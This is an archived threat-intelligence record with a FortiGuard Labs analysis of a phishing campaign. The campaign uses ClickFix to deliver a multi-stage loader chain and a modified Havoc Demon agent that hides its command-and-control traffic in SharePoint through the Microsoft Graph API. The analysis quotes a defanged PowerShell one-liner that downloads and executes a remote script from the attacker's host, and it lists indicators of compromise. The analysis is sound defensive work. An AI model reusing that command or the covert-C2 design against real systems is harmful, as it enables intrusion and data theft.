{ "id": "c48579d6-15a9-4760-8487-107c379de9c3", "created_at": "2026-04-06T00:21:27.395959Z", "updated_at": "2026-04-10T03:24:24.363261Z", "deleted_at": null, "sha1_hash": "b225cf55d6910cbd911b6aa419fe300ba62d21ed", "title": "Havoc: SharePoint with Microsoft Graph API turns into FUD C2 | FortiGuard Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6517604, "plain_text": "Havoc: SharePoint with Microsoft Graph API turns into FUD C2 |\r\nFortiGuard Labs\r\nBy Yurren Wan\r\nPublished: 2025-03-03 · Archived: 2026-04-05 19:01:43 UTC\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Any organization\r\nImpact: Attackers gain control of the infected systems\r\nSeverity level: High\r\nHavoc is a powerful command-and-control (C2) framework. Like other well-known C2 frameworks, such as\r\nCobalt Strike, Silver, and Winos4.0, Havoc has been used in threat campaigns to gain full control over the target.\r\nAdditionally, It is open-source and available on GitHub, making it easier for threat actors to modify it to evade\r\ndetection.\r\nFortiGuard Labs recently discovered a phishing campaign that combines ClickFix and multi-stage malware to\r\ndeploy a modified Havoc Demon Agent. The threat actor hides each malware stage behind a SharePoint site and\r\nuses a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2\r\ncommunications within trusted, well-known services. Figure 1 shows the attack chain.\r\nFigure 1: Attack flow\r\nInitial Access\r\nThe attack campaign starts with a phishing email containing an HTML file as an attachment, as illustrated in\r\nFigure 2. It uses a brief explanation and an urgent tone to prompt the recipient to open the attachment\r\nimmediately.\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 1 of 12\n\nFigure 2: The phishing e-mail\r\nThe attachment, “Documents.html,” is a ClickFix attack that embeds a fake error message and instructions in\r\nHTML to deceive users into copying and pasting a malicious PowerShell command into their terminal or\r\nPowerShell, ultimately executing malicious code.\r\nFigure 3: Document.html using ClickFix social engineering tactic\r\nDecoding the base64-encoded string shown in Figure 3 reveals a PowerShell command that downloads and\r\nexecutes a remote PowerShell script.\r\npowershell -w h -c \"iwr ‘hxxps://hao771[.]sharepoint.com/_layouts/15/download.aspx?share=EU7smZuKo-pDixZ26BSAaX0BVVcF5VkOc7qEvjsDSAH9OQ'|iex\"\r\npayload_20250112_074319.ps1\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 2 of 12\n\nThe Script file is hosted in SharePoint and controlled by the threat actor. When the script runs, it checks whether\r\nthe execution environment is a sandbox by verifying the number of domain computers. It then deletes all registry\r\nentries under HKCU:\\Software\\Microsoft with names starting with \"zr_\" and adds the specified property as an\r\ninfection marker, as shown in Figure 4.\r\nFigure 4: PowerShell script for sandbox evasion and infection tagging\r\nNext, the script verifies the existence of pythonw.exe. If it’s not found, it downloads the Python interpreter.\r\nOtherwise, it directly runs the Python script. Finally, the remote Python script is retrieved and executed in hidden\r\nwindows to obscure malicious activity, as shown in Figure 5.\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 3 of 12\n\nFigure 5: PowerShell script for downloading and executing the remote Python script\r\nPython Shellcode Loader - payload_20250107_015913.py\r\nLike the PowerShell script, the Python script is hosted on the same SharePoint. It contains debug information\r\nwritten in Russian and serves as a shellcode loader.\r\nWe executed the script directly with the Python interpreter in the terminal. The log displays “Выделение памяти”\r\n(memory allocation), \"Запись в память” (write to memory), \"Выполнение shellcode” (execution of shellcode),\r\nand \" Завершение выполнения скрипта” (script execution completion) in sequence, indicating successful\r\nshellcode execution, as seen in Figure 6.\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 4 of 12\n\nFigure 6: Python script for shellcode execution\r\nKaynLdr\r\nKaynLdr is a Github Shellcode Loader designed to reflectively load an embedded DLL. It complicates analysis by\r\nusing API hashing with a modified DJB2 algorithm and leverages resolved ntdll APIs for memory allocation and\r\nmapping. The instruction “call rax” executes the embedded DLL's entry point, as shown in Figure 7.\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 5 of 12\n\nFigure 7: Executing the dll with KaynLDR shellcode loader\r\nHavoc Demon DLL\r\nHavoc is an open-source post-exploitation command and control framework used in red teaming exercises and\r\nattack campaigns to gain complete control over compromised targets.\r\nIn this attack campaign, we observed that the threat actor uses Havoc in conjunction with the Microsoft Graph API\r\nto conceal C2 communication within well-known services.\r\nThe modified Havoc Demon DLL still starts with DemonInit and uses the same hash algorithm as KaynLdr to\r\nretrieve the necessary APIs and initialize the configuration objects.\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 6 of 12\n\nFigure 8: DemonMain in the modified Havoc Demon DLL and the retrieved APIs are stored in the structure\r\nbeginning at address 0xb6\r\nThe second function, “SharePointC2Init,” initializes files on the actors' SharePoint site using the Microsoft Graph\r\nAPI.\r\nIt first combines the hardcoded shared secret with the necessary parameters for a POST request. It then sends the\r\nrequest to the /token endpoint of the Microsoft Identity Platform to obtain access tokens for Microsoft Graph\r\nAPIs.\r\nFigure 9: Access token request with a hardcoded shared secret\r\nNext, it utilizes the obtained token to create two files in SharePoint's default document library by making a PUT\r\nrequest, as shown in Figure 10.\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 7 of 12\n\nFigure 10: Creating a file in the root folder\r\nThe Havoc AgentID generates the VictimID as a filename, concatenated with the suffix “pD9-tKout/pD9-tKin” to\r\nindicate their purpose.\r\nTable 1: Two files utilized for Sharepoint C2 to control the target.\r\nThe initial packet sent to C2 is a CheckIn request containing data gathered from the DemonMetaData function. In\r\nthis step, the victim's information—such as Host Name, User Name, Domain Name, IP Address, Process Details,\r\nOS Information, whether the user has an elevated account, and the configuration in the Demon DLL—is sent to\r\nthe C2 server.\r\nAll content is encrypted using the AES-256 algorithm in CTR mode with a randomly generated 256-bit key and a\r\n128-bit IV. Finally, it is combined with the header, as illustrated in Figure 11, before being sent to the C2 server\r\nvia the TransportSend function.\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 8 of 12\n\nFigure 11: The contents of CheckIn request and Metadata Structure in Havoc Github\r\nThe TransportSend function has been modified to communicate with the C2 by accessing two files:\r\n{VictimID}pD9-tKout and {VictimID}pD9-tKin.\r\nIt updates the request to the “{VictimID}pD9-tKout” file and then retrieves the response from the C2 by using\r\nMicrosoft Graph API with the GET method to access the contents of the ‘{VictimID}pD9-tKin’ file. If the\r\nresponse is successfully retrieved, the content of file '{VictimID}pD9-tKin' is immediately erased.\r\nFigure 12: The modified TransportSend function and the function “FetchInFile”\r\nNext, the content in the response is compared with the AgentID. If they match, the session.connected flag is set,\r\nand it enters the dispatcher routine to await new tasks from the attacker.\r\nIn the dispatcher routine, the agent sends a 'Get Job' request and parses the response into Command ID, Request\r\nID, and task. Although we only observed DEMON_COMMAND_NO_JOB (Command ID: 0xA) during our\r\nanalysis, as shown in below, we found that the task would be decrypted and executed if a different command ID\r\nexists and is not 0xA in the program.\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 9 of 12\n\nFigure 13: Accessing the contents of the ‘{VictimID}pD9-tKin’ file\r\nThe supported commands are the same as those in Havoc Github, as shown in Figure 14. They include gathering\r\ninformation about the target, file operations, command and payload execution, token manipulation, and Kerberos\r\nAttacks.\r\nFigure 14: The primary function for executing the Demon command\r\nConclusion\r\nIn addition to staying alert for phishing emails, guided messages that encourage opening a terminal or PowerShell\r\nmust be handled with extra caution to prevent inadvertently downloading and executing malicious commands.\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 10 of 12\n\nIn this article, we uncovered the execution flow and the altered open-source post-exploitation framework used in\r\nthis attack. Public services once again play a crucial role in the attack campaign, now further integrated with\r\nmodified Havoc Demon to hide malicious communication within the Microsoft Graph API, making identification\r\nand detection even more challenging.\r\nFortinet Protections\r\nThe malware described in this report are detected and blocked by FortiGuard Antivirus as:\r\nHTML/Agent.A5D4!tr\r\nPowerShell/MalwThreat!ebc5FT\r\nPython/Agent.DF60!tr\r\nW64/Havoc.L!tr\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard Antivirus Service. The FortiGuard\r\nantivirus engine is part of each of those solutions. As a result, customers who have these products with up-to-date\r\nprotections are protected.\r\nThe FortiGuard CDR (content disarm and reconstruction) service can disarm the malicious macros within the\r\ndocument.\r\nFortiGuard Labs provides the Backdoor.Havoc.Agent IPS signature to block Havoc C2 network communications.\r\nWe also suggest that organizations take the free Fortinet Fortinet Certified Fundamentals (FCF) cybersecurity\r\ntraining. The training is designed to help users learn about today's threat landscape and introduces basic\r\ncybersecurity concepts and technology.\r\nFortiGuard IP Reputation and Anti-Botnet Security Service proactively block malware attacks by aggregating\r\nmalicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative\r\ncompetitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile\r\nsources.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact the Global\r\nFortiGuard Incident Response Team.\r\nIOCs\r\nC2\r\nhao771[.]sharepoint.com\r\nFiles\r\n51796effe230d9eca8ec33eb17de9c27e9e96ab52e788e3a9965528be2902330\r\n989f58c86343704f143c0d9e16893fad98843b932740b113e8b2f8376859d2dd\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 11 of 12\n\nA5210aaa9eb51e866d9c2ef17f55c0526732eacb1a412b910394b6b51246b7da\r\ncc151456cf7df7ff43113e5f82c4ce89434ab40e68cd6fb362e4ae4f70ce65b3\r\nSource: https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 12 of 12\n\n https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2 \nFigure 6: Python script for shellcode execution \nKaynLdr \nKaynLdr is a Github Shellcode Loader designed to reflectively load an embedded DLL. It complicates analysis by\nusing API hashing with a modified DJB2 algorithm and leverages resolved ntdll APIs for memory allocation and\nmapping. The instruction “call rax” executes the embedded DLL's entry point, as shown in Figure 7.\n Page 5 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2" ], "report_names": [ "havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434887, "ts_updated_at": 1775791464, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b225cf55d6910cbd911b6aa419fe300ba62d21ed.pdf", "text": "https://archive.orkl.eu/b225cf55d6910cbd911b6aa419fe300ba62d21ed.txt", "img": "https://archive.orkl.eu/b225cf55d6910cbd911b6aa419fe300ba62d21ed.jpg" } }